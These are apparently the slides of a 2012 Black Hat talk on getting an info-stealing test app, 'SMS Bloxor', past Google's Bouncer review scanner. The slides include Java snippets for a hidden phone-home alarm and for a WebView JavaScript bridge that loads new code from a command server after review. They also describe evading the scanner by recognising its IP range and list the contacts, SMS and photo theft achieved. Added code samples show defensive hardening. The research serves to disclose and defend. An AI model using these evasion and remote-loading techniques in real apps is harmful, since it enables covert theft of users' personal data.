• Started InfoSec career in the 1990s

• Formed SpiderLabs at Trustwave in 2005

• 3rd talk at Black Hat, DEF CON (6 times), briefings for DHS, US-CERT, and United States Secret Service

• Research areas include Data Breaches, Malware, and Mobile Computing

• Primary Author of the annual Trustwave Global Security Report

• @c7five on Twitter
Introductions - About Sean

Backend SSL services developer at Trustwave
Writes mobile apps and video games
Performs malware analysis on Android

Discovered design flaw in Android
- Presented at DEF CON 19

@sirsean on Twitter
Mobile malware rarely makes an appearance

- Security Researchers, yes.

- General Public, no.

Consumer Devices

- Lack good built-in activity visibility

Targeted attacks are happening
Widespread catastrophes around the corner
• Targeted Mobile Attacks Exist

- Never make media reports

- How many go undetected?

• Android and iOS malware gets personal

- Pinpoints:

• Where you are

• What you are doing

• Records your activities in the digital and physical worlds
Top of Mind is APP SALES!

- These are major revenue generators!

Everyone's dying to get into Apple's App Store

- They can make the barrier very high

• Google Android developers can publish easily

- This was motivated by business, not security.

- Created a major problem for Google

- "Bouncer" was their answer...
• Google is one of the largest tech companies

• The best search technology

• Crazy future-creating research projects

• 800,000 Android devices activated EVERY DAY

• Android gets them $1.70 per device per year¹

• Estimated $400 Million in 2011¹

1 - Horace Dediu's analysis (http://www.asymco.com/2012/04/02/android-economics)
Our Motivations - Reactive Markets

Historically mobile markets were reactive
The world finds all types of mobile malware

- Mostly Zeus, SpyEye, and SMS hijack variants
Low barriers of entry make a criminal happy
Results: Lots of malware, no one detecting it
Our Motivations - Bouncer Revealed

Reactive approach is a losing battle

- Criminals can create malware faster than people will ever detect and report it

Google came to the same conclusion

- Funded "Bouncer" with some of that $400M

Formally announced on February 2nd, 2012²

2 - http://googlemobile.blogspot.com/2012/02/android-and-security.html
Our Motivations - Curious, we are.

In the age of "Bouncer":

- How difficult would it be to slip some malware past him?

- How long could we perform research before getting caught?

The results would benefit all app market owners, not just Google.

Thus began our Adventures in Bouncerland!

Black Hat USA 2012
What We Knew About "Bouncer"

• Before February 2nd, 2012 only Google knew "Bouncer" existed

• We learned from Google³:

- It's automated.

- Scans new and old

- Stops known malware immediately

- Behavior based

- Runs in Google's Cloud, simulates Android runtime

- Looks for "hidden, malicious" behavior

3 - http://googlemobile.blogspot.com/2012/02/android-and-security.html
What We Knew About "Bouncer"

• "Bouncer's" description sounded scary

• Lots of hurdles to overcome to be a successful malware developer for Android now

• We expected to fail - hard.
All of our previous Android research was lab based

Testing "Bouncer" would mean utilizing 
Google's resources 

We needed to establish rules to avoid 
problems 
• We will not attempt to obtain access to Google's infrastructure beyond what is already supplied during the normal application review process.

- Rooting and remote shells are prohibited.

- This would be irresponsible and likely illegal.

• We would put controls in place that would 
reduce the chance of an end-user 
downloading malware we placed within the 
marketplace and that it would not execute if 
downloaded. 

- We paid very close attention to this every step of 
the way. 
Research Approach & Process - Goals

• Establish a legitimate Android developer account

• Test the bounds of "Bouncer" malware detection
- Using only legitimate tools provided in the SDK

• Look for ways to hide malicious functionality

• Record our results to help improve how this is being done
Phase 0 - Build a Benign App

Developed a fully functional benign app

The application was one that is very common

- One of the factors to mitigate the chance of someone else downloading it

We did not trust that "Bouncer" was fully automated

- A sloppy "test" app would stand out quickly
Meet "SMS Bloxor"

[Screenshot: the "SMS Bloxor" app. Listing text: "Block ANY SMS Number", "No Carrier Fees", "Simple Block / Unblock Features". The "Add To Blacklist" screen shows the number 123-555-0001 entered on a dial pad, with a Done button.]
It's an SMS blocker!

Phase 0 - "SMS Bloxor" Phone Home

We needed to know if our app was being scanned by "Bouncer"

"Bouncer" might allow apps to access the Internet

We added a simple BroadcastReceiver.
"SMS Bloxor" Phone Home

    <receiver android:name=".receiver.CommunicationReceiver" />

In our BroadcastReceiver, we schedule it to run itself again in the future using a PendingIntent and the AlarmManager.

    // Inside CommunicationReceiver.onReceive(Context context, Intent intent):
    // build an alarm that broadcasts back to this same receiver
    Intent alarmIntent = new Intent(context, CommunicationReceiver.class);
    PendingIntent pendingIntent = PendingIntent.getBroadcast(context, 0, alarmIntent,
            PendingIntent.FLAG_UPDATE_CURRENT);
    AlarmManager alarmManager =
            (AlarmManager) context.getSystemService(Context.ALARM_SERVICE);
    // nextTime() is the app's own helper returning the next wake-up time in epoch milliseconds
    alarmManager.set(AlarmManager.RTC_WAKEUP, nextTime(), pendingIntent);
Phase 0 - "SMS Bloxor" Phone Home

It will phone home even when it is asleep 

Will NOT appear in the list of "currently 
running apps" 

In this phase, our backend server is just 
recording IP and basic information with the 
request. 
"SMS Bloxor" Benign Demo

[Screenshot: the benign build of "SMS Bloxor". Listing text: "Block ANY SMS Number", "No Additional Carrier Fees", "Simple Block / Unblock Features". The "Add To Blacklist" screen shows 123-555-0001 entered on the dial pad, with a Done button.]
Creating a Google Android Developer account is quick and painless.

Selling apps takes an additional step of linking in an active Google Checkout (merchant) account.

Total effort took less than 60 minutes!

[Screenshot of the approval notice:]
Your Registration to the Android Market is approved!
You can now upload and publish software to the Android Market.
• We then populated all the required fields and uploaded our APK file.

[Screenshot: developer console entry for the uploaded APK]
  Status: Active
  VersionCode: 1
  VersionName: 1.0
  API level: 7-16+
  Supported screens: small-xlarge
  Size: 27k
  Localized to: default
  OpenGL textures: all
  Permissions: android.permission.RECEIVE_BOOT_COMPLETED, android.permission.INTERNET,
               android.permission.RECEIVE_SMS, android.permission.READ_CONTACTS
  Features: android.hardware.telephony, android.hardware.touchscreen
We wanted to mitigate the chance of an end user downloading our app.

Most other "SMS Blockers" are either free or less than $2.00.

We priced ours at $49.95

[Screenshot: "All Android Market listings" - SMS Bloxor 1.0, Applications: Communication, 0 total installs (users), 0 active installs (devices), $49.95, Published.]
Phase 0 - "Bouncer" Appears

Within a few minutes, our back end control system received a web request:

We now know more about "Bouncer":

- He scans upon publishing and is likely automated.

- The IP belonged to Google.

- "Bouncer" wants everyone to think he is an actual device, not an emulator.
Phase 0 - Let's Try That Again

Never build off of a single test.

We waited a day and published version 1.0.1
"Bouncer" scanned us again.

• Different IP, but same network block.
"SMS Bloxor" in the Market

[Screenshot: Android Market listing page for SMS Bloxor]
  Description: Easily block any SMS number from reaching your phone. This application allows you to easily block any SMS number from reaching your phone.
  Updated: March 6, 2012
  Current version: 1.0.1
  Requires Android: 2.1 and up
  Category: Communication
  Size: 26k
  Price: $49.95
  Content rating: Everyone
  (App screenshots: the "Add To Blacklist" screen with 123-555-0001 entered.)
We knew where "Bouncer" lived.


• We made "SMS Bloxor" have two modes: 

- If run within Google, don't execute maliciously. 

- If run outside* of Google, run maliciously. 

* We defined "outside" as within Trustwave's network for this 
research. 
We also wanted to avoid manual review detection.

- Having both malicious and non-malicious functionality in the app would certainly sound alarms during code review.

We turned to a legitimate technique allowed by Google for a solution.

Facebook's app lives inside a "native wrapper". 

This allows the app to live along side all the other 
Android apps. 

It also allows Facebook to update the HTML and 
Javascript functionality without having to update 
the app. 

Facebook's app can dynamically enable OS-level 
functionality through Android's Javascript bridge. 
Facebook's app can dynamically enable OS-level functionality through Android's Javascript bridge.


This means ANY app that is using Android's 
Javascript bridge could become malware at 
any time after the review process. 
• If it works for Facebook, it'll work for us:

    WebView webView = new WebView(context);
    webView.getSettings().setJavaScriptEnabled(true);
    // "bridge" is the app's Java object exposed to script under the name "Bridge"
    webView.addJavascriptInterface(bridge, "Bridge");
    // RawFileReader is the app's own helper; R.raw.default_js is the bundled bootstrap page
    webView.loadData(RawFileReader.readFile(webView.getContext(), R.raw.default_js),
            "text/html", "UTF-8");

• When we need to load new functionality:

    webView.postUrl(API_ENDPOINT, postData(bridge));
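The snippet above is the weak form of a WebView: JavaScript is on, an arbitrary object is exposed as "Bridge", and whatever the server posts back replaces the page, so the app's behaviour after review is whatever the server decides. The following is an added example, not the talk's code or Facebook's, of the hardened counterpart a reviewer would want to see: only pages bundled in the APK load, sub-resources that are not bundled are refused, and the bridge is one read-only query that is attached only on API 17 and later, where the @JavascriptInterface annotation limits what script can reach. LockedDownWebView, BlocklistBridge and the bundled page name default.html are assumptions, as is a minimum API level of 16.

```java
import android.content.Context;
import android.os.Build;
import android.webkit.JavascriptInterface;
import android.webkit.WebResourceResponse;
import android.webkit.WebSettings;
import android.webkit.WebView;
import android.webkit.WebViewClient;

import java.io.ByteArrayInputStream;
import java.util.Set;

/**
 * A WebView whose behaviour is fixed at build time: it renders only pages
 * bundled in the APK, fetches nothing from the network, and exposes a single
 * read-only bridge method. Illustrative code, not part of the talk's app.
 */
public final class LockedDownWebView {

    // Only content shipped inside the APK may be rendered or fetched.
    private static final String ASSET_PREFIX = "file:///android_asset/";

    private LockedDownWebView() {}

    /** Minimal bridge: a query the page may ask, nothing that changes device state. */
    public static final class BlocklistBridge {
        private final Set<String> blocked;

        public BlocklistBridge(Set<String> blocked) {
            this.blocked = blocked;
        }

        // From API 17 only @JavascriptInterface methods are callable from script;
        // before that every public method is reachable through reflection, which
        // is why create() attaches the bridge on API 17+ only.
        @JavascriptInterface
        public boolean isBlocked(String number) {
            return number != null && blocked.contains(number);
        }
    }

    /** True only for URLs inside the APK's asset directory (no traversal). */
    public static boolean isBundledUrl(String url) {
        return url != null && url.startsWith(ASSET_PREFIX) && !url.contains("..");
    }

    public static WebView create(Context context, BlocklistBridge bridge) {
        WebView webView = new WebView(context);
        WebSettings settings = webView.getSettings();
        settings.setJavaScriptEnabled(true);          // needed by the bundled page only
        settings.setAllowFileAccess(false);           // android_asset/ stays reachable
        settings.setAllowContentAccess(false);
        settings.setAllowFileAccessFromFileURLs(false);
        settings.setAllowUniversalAccessFromFileURLs(false);

        webView.setWebViewClient(new WebViewClient() {
            // Refuse navigation away from bundled pages (true = do not load).
            @Override
            public boolean shouldOverrideUrlLoading(WebView view, String url) {
                return !isBundledUrl(url);
            }

            // Refuse non-bundled sub-resources (scripts, XHR), so a server change
            // after review cannot deliver new code into the page.
            @Override
            public WebResourceResponse shouldInterceptRequest(WebView view, String url) {
                if (isBundledUrl(url)) {
                    return null;                      // let WebView load it normally
                }
                return new WebResourceResponse("text/plain", "UTF-8",
                        new ByteArrayInputStream(new byte[0]));
            }
        });

        if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.JELLY_BEAN_MR1) {
            webView.addJavascriptInterface(bridge, "Bridge");
        }
        webView.loadUrl(ASSET_PREFIX + "default.html");  // assumed bundled page name
        return webView;
    }
}
```

The property this buys is that nothing the server sends after review can change what the WebView does: the bridge surface and the pages it runs are fixed in the APK, so a review of the APK is a review of the app's actual behaviour rather than of one snapshot of it.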
Avoiding detection was our goal!

We always included legitimate functionality within "SMS Bloxor" that mirrored the malicious functionality we wanted.

We could also now turn our control server into a Command & Control (C&C) server via the Javascript bridge.

"SMS Bloxor" Phases 1 - 7

Phase | Version | Legit                                           | Malware                    | Scan | Detect
------+---------+-------------------------------------------------+----------------------------+------+-------
1     | 1.1     | Select block numbers from contacts              | Steal all contacts         | Yes  | No
2     | 1.2     | Select block numbers from SMS history           | Steal all SMS records      | Yes  | No
3     | 1.3     | See your own phone number                       | Complete phone recon       | No   | No
4     | 1.4     | Select photos to associate with blocked numbers | Steal all photos on device | Yes  | No
5     | 1.5     | Select block numbers from phone history         | Steal all phone records    | Yes  | No
6     | 1.6     | Added advertisements                            | Hijack user's screen       | Yes  | No
7     | 1.7     | Add analytics                                   | DDoS any website           | Yes  | No
"SMS Bloxor" Command & Control

[Screenshot: the "SMS Bloxor" C&C web panel. Navigation: Home, Phone Recon, Blacklist, Contacts, Phone Records, SMS Records, Photos, Hijack, Botnet. A "Recent" table with columns IP, Phone, Visited at, Contacts, SMS, Recon, Photo, Phone Records lists check-ins from 127.0.0.1 between 2012-07-05 14:50:33 -0500 and 2012-07-05 15:43:18 -0500.]
Final Test - Let's Get Caught

We were successful at creating a "mobile info-stealing botnet" and getting it published without detection.

We turned off the IP block and submitted another version.

- We still did not get caught.
Final Test - Let's Get Caught

Changed interval from 15 minutes to 1 second

We angered "Bouncer"

He scanned us 19 times within 6 minutes

But we did get data back...
Final Test - Let's Get Caught

• Contacts: 412-722-5225 & 202-456-1111

• Phone Number: 15555215877

• Voicemail: 15552175049

• ANDROID_ID: 9774d56d682e549c

• Device ID: 112358132134559

• Subscriber ID: 310260509066168

• SIM Serial Number: 89014103211118510720
Final Test - Let's Get Caught

And we also received this:

Subject: Notification of Google Play Developer Account Suspension
From: Google Play Support (googleplay-developer-support@google.com)
To:
Date: Thursday, May 3, 2012 11:50 AM

This is a notification that your Google Play Publisher account has been terminated.

REASON FOR TERMINATION: Violations of the Content Policy and Developer Distribution Agreement

Please note that Google Play Publisher terminations are associated with developers, and may span multiple account registrations and related Google services. If you feel we have made an error, you can visit the Google Play Help Center article for additional information regarding this termination.

Please do not attempt to register a new developer account. We will not be restoring your account at this time.
The Google Play Team

"SMS Bloxor" Evil Demo

Steals your contacts
Uploads your SMS history
Fingerprints your device
Grabs all your photos
Uploads your call records
Hijacks your screen
Makes your device part of a botnet

[Screenshot: the same "SMS Bloxor" Add To Blacklist screen with 123-555-0001 entered on the dial pad.]
What We Learned - "Bouncer" Flaws

Everything Google said about "Bouncer" was true.

Its main weakness is that developers can easily determine when their app is being run by it.

Android also allows any developer to bypass this process via a Javascript bridge.
What We Learned - A Better "Bouncer"

A better "Bouncer" would consist of other entry and end-point evaluations.

"Bouncer" would run the apps for longer than a few minutes to verify functionality.

Developers would be required to submit functionality maps with their APKs.

End-users would receive these maps with each download and their devices would prevent actions outside of those maps.

Javascript bridges must be strictly limited.
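The functionality-map proposal above can be sketched as an enforcement check. This is added illustrative code, not from the talk or from Google: the developer declares which class of device data may reach which sink, and the device-side check refuses flows outside that declaration. The source and sink names, the map (built from the "Legit" column of the phases table) and the observed trace are constructed assumptions; a real enforcement point would get the observed flows from the platform's data-access mediation, which this sketch does not model.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

/**
 * Sketch of a "functionality map": declared (source -> sink) flows for an app,
 * checked against the flows actually observed on the device. Illustrative code
 * only; names and trace are constructed.
 */
public final class FunctionalityMapMonitor {

    /** A flow of one class of device data (source) to one destination (sink). */
    public static final class Flow {
        public final String source;
        public final String sink;

        public Flow(String source, String sink) {
            this.source = source;
            this.sink = sink;
        }

        @Override public boolean equals(Object o) {
            if (!(o instanceof Flow)) return false;
            Flow f = (Flow) o;
            return source.equals(f.source) && sink.equals(f.sink);
        }

        @Override public int hashCode() { return 31 * source.hashCode() + sink.hashCode(); }

        @Override public String toString() { return source + " -> " + sink; }
    }

    /** The map an SMS blocker would submit: each "Legit" row of the phases table as a flow. */
    public static Set<Flow> smsBlockerMap() {
        return new HashSet<>(Arrays.asList(
                new Flow("contacts", "local_ui"),      // select block numbers from contacts
                new Flow("sms_log", "local_ui"),       // select block numbers from SMS history
                new Flow("phone_number", "local_ui"),  // see your own phone number
                new Flow("photos", "local_storage"),   // associate photos with blocked numbers
                new Flow("call_log", "local_ui"),      // select block numbers from phone history
                new Flow("app_id", "network")));       // phone-home / analytics: only an app id leaves
    }

    /**
     * Returns every observed flow the map does not declare, once each, in the
     * order first seen. Identical permissions are needed for "select contacts"
     * and "steal contacts"; the sink is what separates them, and an undeclared
     * off-device sink is what this check refuses.
     */
    public static List<Flow> undeclaredFlows(Set<Flow> map, List<Flow> observed) {
        List<Flow> violations = new ArrayList<>();
        Set<Flow> reported = new HashSet<>();
        for (Flow f : observed) {
            if (!map.contains(f) && reported.add(f)) {
                violations.add(f);
            }
        }
        return violations;
    }

    public static void main(String[] args) {
        // Constructed trace: benign behaviour of phases 1 and 7, then the
        // malicious behaviour of phases 1 and 2 from the table.
        List<Flow> trace = Arrays.asList(
                new Flow("contacts", "local_ui"),
                new Flow("app_id", "network"),
                new Flow("contacts", "network"),
                new Flow("sms_log", "network"),
                new Flow("sms_log", "network"));
        for (Flow v : undeclaredFlows(smsBlockerMap(), trace)) {
            System.out.println("DENY " + v);
        }
    }
}
```

With a map of this kind the two columns of the phases table, which need exactly the same manifest permissions, become distinguishable at the point of use: reading contacts into the blocklist screen is declared, sending contacts to the network is not, and the check reports precisely those flows rather than the permission grant.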
Conclusions

• These issues are going to affect both public and private markets being used today and developed for tomorrow.

• Application markets with malware detection can easily be bypassed.

- Both automated and manual reviews

• Unless malware detection is built into the OS, developers will always find ways to bypass pre-entry detection.
Please make sure you fill out the Black Hat Evaluation Form!